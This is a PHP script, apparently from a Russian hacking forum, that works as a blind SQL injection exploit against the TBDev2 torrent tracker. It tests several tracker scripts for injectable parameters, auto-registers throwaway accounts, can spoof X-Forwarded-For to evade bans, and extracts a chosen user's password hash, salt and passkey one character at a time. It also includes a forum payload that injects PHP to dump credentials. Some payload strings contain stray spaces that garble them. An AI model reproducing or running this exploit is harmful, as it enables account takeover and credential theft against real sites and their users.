<?php
/*+---------------------------------------------------------+
| TBDev2 Blind SQL Injection Exploit (v 3.3) |
| |
| Автор: Rostov114 |
| Основан на Exploit от Qwazar |
| |
| Благодарности: +toxa+, NitroIMX, Draco, antichat.ru |
| HAXTA4OK |
+---------------------------------------------------------+*/
set_time_limit(0);
ignore_user_abort(1);
error_reporting(E_ALL & ~E_NOTICE);
function getcookie($url, $name, $password){
$res = send_xpl($url,"username=$name&password=$password", 'login');
preg_match("/Set-Cookie: uid=(\d+)*;/", $res, $matches);
$uid = $matches[1];
preg_match("/Set-Cookie: pass=([\w+\d+]{32});/", $res, $matches);
$passhash = $matches[1];
preg_match("/Set-Cookie: session=([\w+\d+]{32});/", $res, $matches);
$session = $matches[1];
if(isset($session))
$res = "session=$session;";
else
$res = "uid=$uid; pass=$passhash;";
if((isset($uid) and isset($passhash)) or isset($session))
return $res;
else
return false;
}
function send_xpl($url, $xpl, $type, $no_read=0){
global $id, $cookie, $name, $formated, $ips;
$res = '';
$u = parse_url($url);
$u['path'] = (substr($u['path'], (strlen($u['path'])-1), strlen($u['path'])) == '/') ? $u['path'] : $u['path'] .= '/';
switch($type)
{
case 'login':
$data = $xpl;
$req = "POST ".$u['path']."takelogin.php HTTP/1.0\r\n";
break;
case 'takesignup':
$data = "wantuse rname=admin&wantpas sword=12345 6&passagain=123456&gender=1&country=1&year=1970&mon th=01&day=01&";
$data .= "rulesverify=yes &faqverify=ye s&ageverify=yes &email={$xpl}";
$req = "POST ".$u['path']."takesignup.php HTTP/1.0\r\n";
break;
case 'check':
$data = "action=email&email={$xpl}";
$req = "POST ".$u['path']."check_signup.php HTTP/1.0\r\n";
break;
/*case 'open_way':
$req ="GET ".$u['path']."details.php?id[]= HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;*/
case 'sendbonus':
$data = "amount=1&nick={$xpl}";
$req = "POST ".$u['path']."sendbonus.php HTTP/1.0\r\n";
$req.="Cookie: $cookie\r\n";
break;
case 'do_reg':
$data = "agree=yes&do=register";
$req = "POST ".$u['path']."signup.php HTTP/1.0\r\n";
break;
case 'bonuscode':
$data = "csub=1&code={$xpl}";
$req = "POST ".$u['path']."bonuscode.php HTTP/1.0\r\n";
$req.="Cookie: $cookie\r\n";
break;
/*case 'rss_file':
list($file, $path, $type) = $xpl;
$req ="GET ".$u['path']."rss.php?passkey=-1'+union+select+{$type}+from+use rs+where+id={$id}+in to+outfile+'{$path}to rrents/images/{$file}.txt'+--+ HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;*/
case 'rss_sql':
$req ="GET ".$u['path']."rss.php?passkey=$xpl HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Connection: Close\r\n\r\n";
break;
case 'reg':
$name = gen_name();
preg_match('/name="imagehash" value="([\w+\d+]{32})"/', send_xpl($url, '', 'do_reg'), $match);
$match[1] = $match[1] ? $match[1] : '0';
$data = "wantu sername={$name}&wantpassword=123456&passag ain=123456&gender=1&country=1&year =1970&month=01& day=01&";
$data .= "rulesverify=yes&f aqverify=yes&ageverify=yes&invite=000000000000 00000000000000000000&imagestring=0&";
$data .= "imagehash=".$match[1]."&email={$name}@".$u['host'];
$req = "POST ".$u['path']."takesignup.php HTTP/1.0\r\n";
break;
case 'requests':
$req ="GET ".$u['path']."$xpl HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;
case 'viewoffers':
$req ="GET ".$u['path']."$xpl HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;
case 'forum':
$req ="GET ".$u['path']."forum/forumdisplay.php?fid=2&sortby='];var_export(mysql_fetch_array(mysql_query('select+passhash,secr et,passkey,passkey_ip+fr om+users+wh ere+id={$id}')));exit();// HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
$req.="Connection: Close\r\n\r\n";
break;
}
if($type != 'requests' and $type != 'forum' and $type != 'open_way' and $type != 'rss' and $type != 'viewoffers')
{
$req .= "Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req .= "Content-Length: ".strlen($data)."\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Connection: close\r\n\r\n";
$req .= $data;
}
foreach($ips as $k => $v)
{
$fs = @fsockopen($v, 80, $errno, $errstr, 30) or die("Error: $errno - $errstr\r\n");
if($fs) break;
}
if(!$fs) die("No living servers!\r\n");
fwrite($fs, $req);
while (feof($fs) == false) {
$res .= fread($fs, 8192);
}
fclose($fs);
if($res == '') die("Host die!\r\n");
return $res;
}
function xpl($field, $condition, $pos){
global $id, $type;
switch($type)
{
case 'requests':
$xpl = "requests.php?action=reset&request id=-1+or+id=if(ascii(substring((select+$field+from+users+w here+id=$id),$pos,1))$condit ion,'1',(select+1+unio n+select+2))+--+";
break;
case 'viewoffers':
$xpl = "viewoffers.php?filter=or+us ers.id=if(ascii(substring((select +$field+from+users+where+users. id=$id),$pos,1))$condition,'1', (select+1+union+select+2))+--+";
break;
case 'rss_sql':
case 'bonuscode':
$xpl = "-1'+or+ id=if(ascii(substrin g((select+$field+from+u sers+where+id=$id),$pos,1))$condition, '1',(select+1+union+select+2))+--+'";
break;
default:
$xpl = "-1'+or+id=if(ascii (substring((select+$f ield+from+users+where+id=$id),$pos,1))$condition,'1',(sel ect+1+union+select+2))+--+ @ukrnet.ua";
break;
}
return $xpl;
}
function gen_name()
{
$arr = array('a','b','c','d','e','f', 'g','h','i','j','k','l', 'm','n','o','p','r','s', 't','u','v','x','y','z', 'A','B','C','D','E','F', 'G','H','I','J','K','L', 'M','N','O','P','R','S', 'T','U','V','X','Y','Z');
$name = '';
for($i = 0; $i < 11; $i++)
{
$index = rand(0, count($arr) - 1);
$name .= $arr[$index];
}
return $name;
}
function cond($url, $field, $cond, $pos, $ch) {
global $type;
print load();
if($type == 'bonuscode' or $type == 'rss_sql')
{
if(!preg_match('/valid MySQL/', send_xpl($url, xpl($field,$cond.$ch,$pos), $type)))
return 1;
else
return 0;
}
else
{
if(!preg_match('/Subquery returns/', send_xpl($url, xpl($field,$cond.$ch,$pos), $type)))
return 1;
else
return 0;
}
}
function rss($url)
{
global $type;
/*preg_match('/<b>(\S+)details.php/', send_xpl($url, '', 'open_way'), $match);
if($match[1])
{
// Fix Windowz
$match[1] = str_replace('\\', '/', $match[1]);
$name = gen_name();
$xpl = array($name, $match[1], 'passhash');
send_xpl($url, $xpl, 'rss');
$file = @file($url.'torrents/images/'.$name.'.txt');
if(count($file) >= 2)
{
$file[1] = str_replace(array("\r\n", "\n"), "", $file[1]);
print 'Used method: rss'."\r\n";
echo "Trying to get passhash: ".$file[1]." [DONE]\r\n";
$name = gen_name();
$xpl = array($name, $match[1], 'secret');
send_xpl($url, $xpl, 'rss');
$file = @file($url.$name.'.txt');
$file[1] = str_replace(array("\r\n", "\n"), "", $file[1]);
die("Trying to get salt: ".$file[1]." [DONE]");
}
else
{
echo "File rss.php not vulnerable (file record).\r\n";
}
}
else
{
echo "Opening of ways - failed.\r\n";
}*/
echo "File rss.php - disable (file record).\r\n";
$type = 'rss_sql';
if(!preg_match('/valid MySQL/', send_xpl($url, xpl("passhash","=-1",1), 'rss_sql')))
{
echo "File rss.php not vulnerable (SQL attack).\r\n";
}else{return true;}
}
function forum($url)
{
global $atype;
$res = send_xpl($url, '', 'forum');
if(!preg_match("/'passhash' => '([\w+\d+]{32})'/", $res, $match))
{
echo "Forum absents or not vulnerable.\r\n";
die( "Exploit failed: Target is not vulnerable.\r\n" );
}
else
print 'Used method: forum'."\r\n";
if(in_array('all', $atype) or in_array('passhash', $atype))
{
echo "Trying to get passhash: ".$match[1]." [DONE]\r\n";
}
if(in_array('all', $atype) or in_array('salt', $atype))
{
preg_match("/'secret' => '(\S+)'/", $res, $match);
echo "Trying to get salt: ".$match[1]." [DONE]\r\n";
}
if(in_array('all', $atype) or in_array('passkey', $atype))
{
echo "IP is tied to passkey: ";
preg_match("/'passkey_ip' => '(\S+)'/", $res, $match);
echo $match[1] == '' ? "No\r\n" : "Yes\r\n";
preg_match("/'passkey' => '(\S+)'/", $res, $match);
die("Trying to get passkey: ".$match[1]." [DONE]\r\n");
}
}
function check_user($url)
{
global $type, $id;
if($type == 'bonuscode' or $type == 'rss_sql')
{
if(preg_match('/valid MySQL/', send_xpl($url, xpl("passhash",'-1',1), $type)))
{
die("An user does not exist with ID {$id}\r\n");
}
}
else
{
if(preg_match('/Subquery returns/', send_xpl($url, xpl("passhash",'-1',1), $type)))
{
die("An user does not exist with ID {$id}\r\n");
}
}
}
function load(){ static $i=0; switch($i){ case 0: $i++; return '\\'.chr(8); break; case 1: $i++; return '|'.chr(8); break; case 2: $i++; return '/'.chr(8); break; case 3: $i=0; return '-'.chr(8); break; } }
function isVulnerable($url, $nickname=false, $password=false) {
global $type, $cookie, $name;
if($nickname != '' and $password != '')
{
$type = 'requests';
echo "Login...";
if(!$cookie = getcookie($url, $nickname, $password))
{
echo "Fieled!\r\n";
die( "Incorrect login or password!\r\n" );
}
echo "OK!\r\n";
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'requests')))
{
echo "File requests.php absents or not vulnerable.\r\n";
}else{return; }
$type = 'sendbonus';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'sendbonus')))
{
echo "File sendbonus.php absents or not vulnerable.\r\n";
}else{return; }
$type = 'bonuscode';
if(!preg_match('/valid MySQL/', send_xpl($url, xpl("passhash","=-1",1), 'bonuscode')))
{
echo "File bonuscode.php absents or not vulnerable.\r\n";
}else{return; }
$type = 'viewoffers';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'viewoffers')))
{
echo "File viewoffers.php absents or not vulnerable.\r\n";
die( "Exploit failed: Target is not vulnerable.\r\n" );
}
}
else
{
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'check')))
{
echo "File check_signup.php absents or not vulnerable.\r\n";
}
else
{
$type = 'check';
}
if(!$type)
{
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'takesignup')))
{
echo "File takesignup.php not vulnerable.\r\n";
if(rss($url)) return;
echo "Register...";
$res = send_xpl($url, '', 'reg');
if(preg_match("/Set-Cookie: pass=([\w+\d+]{32});/", $res, $matches))
{
$passhash = $matches[1];
preg_match("/Set-Cookie: uid=(\d+)*;/", $res, $matches);
$uid=$matches[1];
$cookie = "uid=$uid; pass=$passhash;";
if(preg_match("/Set-Cookie: mybbuser=([A-z0-9_]+);/", $res, $matches))
{
$mybbuser = $matches[1];
preg_match("/Set-Cookie: hash=([\w+\d+]{32});/", $res, $matches);
$hash = $matches[1];
$cookie .= " hash=$hash; mybbuser=$mybbuser;";
}
echo "OK! User: {$name}\r\n";
$type = 'requests';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'requests')))
{
echo "File requests.php absents or not vulnerable.\r\n";
}else{return; }
$type = 'sendbonus';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'sendbonus')))
{
echo "File sendbonus.php absents or not vulnerable.\r\n";
}else{return; }
$type = 'bonuscode';
if(!preg_match('/valid MySQL/', send_xpl($url, xpl("passhash","=-1",1), 'bonuscode')))
{
echo "File bonuscode.php absents or not vulnerable.\r\n";
}else{return; }
$type = 'viewoffers';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'viewoffers')))
{
echo "File viewoffers.php absents or not vulnerable.\r\n";
forum($url);
}else{return; }
}
else
{
echo "Fieled!\r\n";
forum($url);
}
}
else
{
$type = 'takesignup';
}
}
}
}
function getChar($url, $field, $pos, $lb=0, $ub=255) {
while(true) {
$M = floor($lb + ($ub-$lb)/2);
if(cond($url, $field, '<', $pos, $M)==1) {
$ub = $M - 1;
}
else if(cond($url, $field, '>', $pos, $M)==1) {
$lb = $M + 1;
}
else
return chr($M);
if($lb > $ub)
return -1;
}
}
function getaddrbyname($host, $type = DNS_A)
{
$result = dns_get_record($host, $type);
$ip = array();
if(is_array($result))
{
foreach($result as $key => $val)
{
$ip[] = $val['ip'];
}
}
$ipc = count($ip);
if($ipc == false)
return false;
else
return $ip;
}
echo "+---------------------------------------------------+\r\n";
echo "| TBDev2 Blind SQL Injection Exploit (v 3.3) |\r\n";
echo "| |\r\n";
echo "| Author: Rostov114 |\r\n";
echo "| Based on Exploit from Qwazar |\r\n";
echo "| |\r\n";
echo "| Credits: +toxa+, NitroIMX, Draco, antichat.ru |\r\n";
echo "| HAXTA4OK |\r\n";
echo "+---------------------------------------------------+\r\n\r\n";
if($argc<3)
{
echo "+-----------------------------------------------------------------+\r\n";
echo "| Multi mode: |\r\n";
echo "| Using tbdev2sql.php url target_id type |\r\n";
echo "| |\r\n";
echo "| target_id - id of target member |\r\n";
echo "| type - that tryning* |\r\n";
echo "| Ex.: tbdev2xpl.php http://www.site.com/ 1 all |\r\n";
echo "| |\r\n";
echo "| Login exploit mode: |\r\n";
echo "| Using tbdev2sql.php url target_id type login password |\r\n";
echo "| |\r\n";
echo "| target_id - id of target member |\r\n";
echo "| login, password - login and password of any existing account |\r\n";
echo "| type - that tryning* |\r\n";
echo "| Ex.: tbdev2xpl.php http://www.site.com/ 1 all test 1234 |\r\n";
echo "| |\r\n";
echo "| |\r\n";
echo "| * all - tryning passkey, salt, passhash |\r\n";
echo "| passhash - tryning passhash |\r\n";
echo "| salt - tryning salt |\r\n";
echo "| passkey - tryning passkey |\r\n";
die("+-----------------------------------------------------------------+\r\n");
}
global $type, $formated, $ips, $atype, $id;
$url = $argv[1];
$id = $argv[2];
$atype = explode(',', $argv[3]);
$nickname = $argv[4];
$pass = $argv[5];
$formated = ''; # если произошол бан на трекере то сюда ввести желаемый IP = )
$u = parse_url($url);
$ips = getaddrbyname($u['host']);
if($ips)
echo 'A host '.$u['host'].' utillizes next addresses: '.implode(', ', $ips)."\r\n";
else
die('A host '.$u['host'].' not found!'."\r\n");
isVulnerable($url, $nickname, $pass);
print 'Used method: '.$type."\r\n";
check_user($url);
if(in_array('all', $atype) or in_array('passhash', $atype))
{
echo "Trying to get passhash: ";
for($i=1;$i<=32;$i++){
$c = getChar($url, "passhash", $i, 47, 103);
if($c==-1)
die("\r\nExploit failed\r\n");
else
echo $c;
}
echo " [DONE]\r\n";
}
if(in_array('all', $atype) or in_array('salt', $atype))
{
echo "Trying to get salt: ";
for($i=1;$i<=20;$i++){
$c = getChar($url, "secret", $i);
if($c==-1)
die("\r\nExploit failed\r\n");
else
echo $c;
}
echo " [DONE]\r\n";
}
if(in_array('all', $atype) or in_array('passkey', $atype))
{
echo "IP is tied to passkey: ";
echo getChar($url, "passkey_ip", 1, 48, 58) == -1 ? "No" : "Yes";
echo " [DONE]\r\n";
echo "Trying to get passkey: ";
for($i=1;$i<=32;$i++){
$c = getChar($url, "passkey", $i, 47, 103);
if($c==-1)
die("\r\nExploit failed\r\n");
else
echo $c;
}
echo " [DONE]\r\n";
}
?>
